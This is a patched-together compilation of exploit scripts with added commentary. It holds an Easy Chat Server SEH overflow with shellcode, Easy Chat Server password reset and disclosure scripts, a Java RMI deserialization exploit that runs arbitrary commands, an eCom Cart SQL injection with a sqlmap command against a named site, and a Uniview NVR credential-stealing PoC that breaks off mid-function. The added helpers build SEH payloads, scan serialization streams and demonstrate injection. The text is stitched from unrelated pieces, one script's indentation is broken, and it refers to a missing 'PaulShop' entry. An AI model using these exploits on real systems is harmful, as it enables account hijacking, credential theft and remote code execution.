"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")
magic = "B" * 217                 # filler up to the SEH record
magic += "\xeb\x06\x90\x90"       # nSEH: jmp short +6 (skips the handler address), padded with nops
magic += "\xBC\x04\x01\x10"       # SEH handler: 0x100104BC (little-endian)
magic += shellcode
magic += "C" * 200
body = "UserName=" + magic + "&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
buffer = "POST /registresult.htm HTTP/1.1\r\n"
buffer += "Host: " + ip + "\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://" + ip + "/register.ghp\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: " + str(len(body)) + "\r\n\r\n"
buffer += body
socket.send(buffer)
data = socket.recv(4096)
print data
socket.close()
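The exploit above places a 4-byte nSEH (`\xeb\x06\x90\x90`) and a 4-byte handler address right after 217 bytes of filler and relies on the short jump skipping over the handler address to land on the shellcode. The helper below is added here and is not part of the advisory: it resolves that landing point from the jump displacement, assembles the same layout, and reports any bytes in the handler address that would break an HTTP form body. The bad-byte set is an assumption (the advisory lists none); the offset and handler address are the ones on the page, and the stand-in shellcode is constructed.

```python
import struct

# Bytes assumed to be unsafe inside a URL-encoded POST parameter (assumption; the
# advisory does not list bad characters): NUL, LF, CR and the form delimiters "&" and "=".
FORM_BAD_BYTES = {0x00, 0x0a, 0x0d, 0x26, 0x3d}

PAGE_OFFSET = 217                # filler before nSEH in the advisory
PAGE_NSEH = b"\xeb\x06\x90\x90"  # jmp short +6 ; nop ; nop
PAGE_HANDLER = 0x100104BC        # "\xBC\x04\x01\x10" little-endian


def short_jmp_target(nseh_offset, nseh):
    """Offset (relative to the start of the buffer) that a 'jmp rel8' placed at nSEH
    lands on: the displacement is counted from the end of the 2-byte instruction."""
    if nseh[0] != 0xEB:
        raise ValueError("nSEH does not start with jmp rel8 (0xEB)")
    (rel,) = struct.unpack("<b", nseh[1:2])     # signed 8-bit displacement
    return nseh_offset + 2 + rel


def bad_bytes_in(value, bad=FORM_BAD_BYTES):
    """Forbidden bytes found in the little-endian encoding of a 32-bit address."""
    return sorted(b for b in struct.pack("<I", value) if b in bad)


def seh_layout(offset, nseh=PAGE_NSEH):
    """Where each piece sits, for checking against a debugger's SEH chain view."""
    return {
        "nseh": offset,
        "seh": offset + 4,
        "shellcode": offset + 8,
        "jmp_lands": short_jmp_target(offset, nseh),
    }


def build_seh_payload(offset, handler, shellcode, nseh=PAGE_NSEH, filler=b"B", tail=200):
    """filler | nSEH | SEH handler | shellcode | tail, refusing handler addresses with
    bad bytes and jumps that do not land on the first shellcode byte."""
    bad = bad_bytes_in(handler)
    if bad:
        raise ValueError("handler address contains bad bytes: %r" % bad)
    layout = seh_layout(offset, nseh)
    if layout["jmp_lands"] != layout["shellcode"]:
        raise ValueError("jmp lands at %d, shellcode starts at %d"
                         % (layout["jmp_lands"], layout["shellcode"]))
    return filler * offset + nseh + struct.pack("<I", handler) + shellcode + b"C" * tail


if __name__ == "__main__":
    sc = b"\xcc" * 16                             # constructed stand-in for the shellcode
    payload = build_seh_payload(PAGE_OFFSET, PAGE_HANDLER, sc)
    print(seh_layout(PAGE_OFFSET), len(payload))
```

With the page's values the jump lands at 217 + 2 + 6 = 225, which is the first byte after the 4-byte handler at 221..224, so the two nop bytes of nSEH are never executed and only exist to pad the record to four bytes.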
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical
# ====================================================================================================
# The registration page 'register.ghp' allows resetting ANY user's password.
# Remote unauthenticated attackers can send HTTP POST requests to hijack ANY Easy Chat Server account.
# ====================================================================================================
# USAGE: python exploit.py ip username password   (the script always connects to port 80)
#!/usr/bin/python
import os,sys,socket
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
body = "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"
buffer = "POST /registresult.htm HTTP/1.1\r\n"
buffer += "Host: " + ip + "\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: " + str(len(body)) + "\r\n\r\n"
buffer += body
socket.send(buffer)
socket.close()
print "[#] Password Changed Successfully"
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical
# =========================================================================================================
# The registration page 'register.ghp' discloses ANY user's password.
# Remote unauthenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user's password.
# =========================================================================================================
# USAGE: python exploit.py ip username
#!/usr/bin/python
import urllib
import re
import requests
import sys
ip = sys.argv[1]
username = sys.argv[2]
url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content
pattern = '<INPUT type="password" name="Password" maxlength="30" value="(.+?)">'
matches = re.findall(pattern, html)
if not matches:
    print "[-] Password field not found in the response"
    sys.exit(1)
print "Password: " + "".join(matches)
#!/usr/bin/env python
import socket
import sys
import ssl
def getHeader():
    # RMI transport handshake: "JRMI" magic, protocol version 2, 'K' = StreamProtocol
    return '\x4a\x52\x4d\x49\x00\x02\x4b'
def payload():
    import struct
    cmd = sys.argv[4]
    cmdlen = len(cmd)
    # Endpoint announcement (UTF "127.0.1.1", port 0), then an RMI Call (0x50) to the registry
    # (ObjID 0, operation 0 = bind, interface hash 0x44154dc9d4e63bdf). The bind argument is a
    # serialized java.lang.reflect.Proxy whose InvocationHandler is a Commons-Collections chain
    # (AnnotationInvocationHandler -> LazyMap -> ChainedTransformer -> InvokerTransformer ->
    # Runtime.exec), as the class names embedded in the bytes show.
    data2 = ('\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67'
             '\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00'
             '\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74')
    # The command is the TC_STRING argument of the last InvokerTransformer: a u2 length followed
    # by the bytes. The original wrote '\x00' + chr(cmdlen), which only works for commands under 256 bytes.
    data2 += struct.pack('>H', cmdlen)
    data2 += cmd
    # "exec" method name, the remaining transformer arguments and the trailing map/class objects
    data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
    return data2
def sslMode():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    # ssl.wrap_socket() was removed in Python 3.12; there use ssl.SSLContext().wrap_socket() instead
    return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")
def exploitTarget(sock):
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)
    print 'sending exploit headers\n'
    sock.send(getHeader())
    sock.recv(8192)          # ProtocolAck from the server
    print 'sending exploit\n'
    sock.send(payload())
    sock.close()
    print 'exploit completed.'
if __name__ == "__main__":
if len(sys.argv) != 5:
print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
sys.exit(0)
else:
sock = None
if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
sock = sslMode()
if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
exploitTarget(sock)
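The script above opens with the 7-byte JRMI handshake (`JRMI`, protocol version 2, `K` for the stream protocol) and then sends a raw Java serialization stream whose embedded class names (`java.lang.reflect.Proxy`, `sun.reflect.annotation.AnnotationInvocationHandler`, `org.apache.commons.collections.map.LazyMap`, `...functors.ChainedTransformer`, `...functors.InvokerTransformer`, `java.lang.Runtime`) identify a Commons-Collections gadget chain. The Python 3 code below is added here as a defender's counterpart and is not part of the exploit: it decodes the handshake header and walks a stream for `TC_CLASSDESC` records so that the classes on the wire can be listed and matched against known gadget packages. The sample stream is constructed inline from descriptor names and serialVersionUIDs that occur in the payload above; the scan is a heuristic over well-formed descriptors, not a full deserializer, and the gadget marker list is an assumption.

```python
import re
import struct

JRMI_MAGIC = b"JRMI"
JRMI_PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}

STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = b"\x00\x05"
TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT = 0x70, 0x71, 0x72, 0x73
TC_STRING, TC_ARRAY, TC_CLASS, TC_ENDBLOCKDATA = 0x74, 0x75, 0x76, 0x78
# Tokens after which a TC_CLASSDESC legitimately appears: a new object, array or
# class instance, or the end of the previous descriptor's class annotation.
CLASSDESC_PREDECESSORS = {TC_OBJECT, TC_ARRAY, TC_CLASS, TC_ENDBLOCKDATA}
# Binary class names: optional array dimensions, a dotted identifier, optional ';' for L...; arrays.
CLASS_NAME_RE = re.compile(rb"^\[*[A-Za-z_$][A-Za-z0-9_$.]*;?$")

# Class prefixes that mark a Commons-Collections style gadget chain (assumed list).
GADGET_MARKERS = (
    "org.apache.commons.collections.functors.",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
)


def parse_jrmi_header(data):
    """Decode the 7-byte RMI transport handshake: magic, u2 version, protocol byte."""
    if len(data) < 7 or data[:4] != JRMI_MAGIC:
        raise ValueError("not a JRMI handshake")
    (version,) = struct.unpack(">H", data[4:6])
    return {"magic": "JRMI", "version": version,
            "protocol": JRMI_PROTOCOLS.get(data[6], "unknown(%#x)" % data[6])}


def extract_class_descriptors(stream):
    """Scan a serialization stream for TC_CLASSDESC records and return
    (offset, class name, serialVersionUID) for each plausible one."""
    if stream[:2] != STREAM_MAGIC or stream[2:4] != STREAM_VERSION:
        raise ValueError("missing java serialization STREAM_MAGIC/STREAM_VERSION")
    found = []
    i = 4
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC and stream[i - 1] in CLASSDESC_PREDECESSORS:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            name = stream[i + 3:i + 3 + length]
            uid_at = i + 3 + length
            if length and len(name) == length and CLASS_NAME_RE.match(name) and uid_at + 8 <= len(stream):
                (uid,) = struct.unpack(">Q", stream[uid_at:uid_at + 8])
                found.append((i, name.decode("ascii"), uid))
                i = uid_at + 8          # skip the name and UID so their bytes are not rescanned
                continue
        i += 1
    return found


def flag_gadget_classes(names):
    """Subset of class names that match a known gadget-chain marker."""
    return [n for n in names if any(n.startswith(m) for m in GADGET_MARKERS)]


def _classdesc(name, uid, fields=b"\x02\x00\x00"):
    """Minimal TC_CLASSDESC: name, serialVersionUID, flags + field count, empty class
    annotation (TC_ENDBLOCKDATA), null superclass. Used only to build the sample."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode("ascii")
            + struct.pack(">Q", uid) + fields + bytes([TC_ENDBLOCKDATA, TC_NULL]))


# Constructed sample shaped like the payload above, reusing descriptor names and
# serialVersionUIDs that appear in it (HashMap, Transformer[], ChainedTransformer).
SAMPLE_STREAM = (
    STREAM_MAGIC + STREAM_VERSION
    + bytes([TC_OBJECT]) + _classdesc("java.util.HashMap", 0x0507DAC1C31660D1)
    + bytes([TC_ARRAY]) + _classdesc("[Lorg.apache.commons.collections.Transformer;", 0xBD562AF1D8341899)
    + struct.pack(">I", 1)
    + bytes([TC_OBJECT]) + _classdesc("org.apache.commons.collections.functors.ChainedTransformer", 0x30C797EC287A9704)
)


if __name__ == "__main__":
    print(parse_jrmi_header(b"\x4a\x52\x4d\x49\x00\x02\x4b"))
    names = [name for _, name, _ in extract_class_descriptors(SAMPLE_STREAM)]
    print(names)
    print("gadget classes:", flag_gadget_classes(names))
```

Matching on the preceding token is what keeps the scan from firing on every `r` (0x72) inside a string; the same scan can be run on a packet capture of port 1099 traffic to see which classes a client is trying to make the registry deserialize.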
# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Version: 1.3
# Tested on: Linux
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php" --data="order_id=1" --dbs
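Both the PaulShop and eCom Cart entries above show the same symptom: a single quote in a request parameter produces a database syntax error because the value is pasted into the query text (the eCom trace shows `PDO->query(...)` failing on `'1` at the end of the statement). The Python 3 snippet below is added here and is not taken from either product: it reproduces the vulnerable pattern against an in-memory SQLite table next to the parameterised form, so the `'1` probe and a boolean payload can be compared side by side. The table, its rows and the query shape are constructed for the example.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the shop database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, total REAL)")
    db.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                   [(1, "alice", 19.90), (2, "bob", 42.00), (3, "carol", 7.50)])
    return db


def charge_vulnerable(db, order_id):
    """Mirrors the pattern behind the eCom trace: the parameter is interpolated into
    the SQL text, so quotes and operators in it become part of the statement."""
    sql = "SELECT * FROM orders WHERE id = %s" % order_id
    return db.execute(sql).fetchall()


def charge_safe(db, order_id):
    """Parameterised query: the value is bound, never parsed as SQL
    (the PDO equivalent is prepare() plus bindValue()/execute())."""
    return db.execute("SELECT * FROM orders WHERE id = ?", (order_id,)).fetchall()


def probe(func, db, value):
    """Classify what an input does: ('rows', result) or ('error', message)."""
    try:
        return ("rows", func(db, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("2", "'1", "1 OR 1=1"):
        print(repr(value), "vulnerable:", probe(charge_vulnerable, db, value),
              "safe:", probe(charge_safe, db, value))
```

The `'1` probe is the fingerprint both advisories rely on: the vulnerable path surfaces the database error, while the bound parameter is simply a string that matches no row. The `1 OR 1=1` case shows why the error message matters less than the query shape: with interpolation it returns every order, with binding it returns nothing.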
#Uniview NVR remote passwords disclosure
#Author: B1t
# The Uniview NVR web application does not enforce authorization on main.cgi when JSON data is requested:
# anything can be requested without authentication, provided the request structure is known.
# In addition, the users' passwords are stored both hashed and in a reversible form.
# The PoC below remotely downloads the device's configuration file, extracts the credentials
# and decodes the reversible password strings using a hand-built character map.
# It is worth mentioning that when you log in, the JavaScript hashes the password with MD5 and sends that in the request.
# If the script retrieves only the hash and not the password, you can intercept the login request and replace the generated
# MD5 with the one disclosed by this script.
# Tested on the following models:
# NVR304-16E - Software Version B3118P26C00510
# NVR301-08-P8 - Software Version B3218P26C00512
#                        and version B3220P11
#
# Other versions may also be affected
#Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT
# Run example:
# root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
#
# Uniview NVR remote passwords disclosure!
# Author: B1t
#
# [+] Getting model name and software version...
# Model: NVR301-08-P8
# Software Version: B3218P26C00512
#
# [+] Getting configuration file...
# [+] Number of users found: 4
#
# [+] Extracting users' hashes and decoding reversible strings:
#
# User    |    Hash                              |    Password
# _________________________________________________
# admin   |    3b9c687b1f4b9d87ed0fdd6abbf7e33d  |    <TRIMMED>
# default |                                      |    ||||||||||||||||||||
# HAUser  |    288b836a37578141fea6527b5e190120  |    123HAUser123[err
# test    |    51b2454c681f3205f63b8372096d990b  |    AA123pqrstuvwxyz
#
# *Note that the users 'default' and 'HAUser' are default and sometimes inaccessible remotely
import requests
import xml.etree.ElementTree
import sys
print "\r\nUniview NVR remote passwords disclosure!"
print "Author: B1t\r\n"
def decode_pass(rev_pass):
    pass_dict = {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '74': '6', '75': '7', '68': '8', '69': '9',
                 '76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89': '%', '34': '^', '90': '&', '86': '*',
                 '84': '(', '85': ')', '81': '-', '35': '_', '65': '=', '87': '+', '83': '/', '32': '\\', '0': '|',
                 '80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82': '.', '67': '?', '64': '<', '66': '>',
                 '2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28': '`', '61': 'A', '62': 'B', '63': 'C',
                 '56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53': 'I', '54': 'J', '55': 'K', '48': 'L',
                 '49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46': 'R', '47': 'S', '40': 'T', '41': 'U',
                 '42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29': 'a', '30': 'b', '31': 'c', '24': 'd',
                 '25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22': 'j', '23': 'k', '16': 'l', '17': 'm',
                 '18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15': 's', '8': 't', '9': 'u', '10': 'v',
                 '11': 'w', '4': 'x', '5': 'y', '6': 'z'}
    rev_pass = rev_pass.split(";")
    pass_len = len(rev_pass) - rev_pass.count("124")   # "124" entries are padding
    password = ""
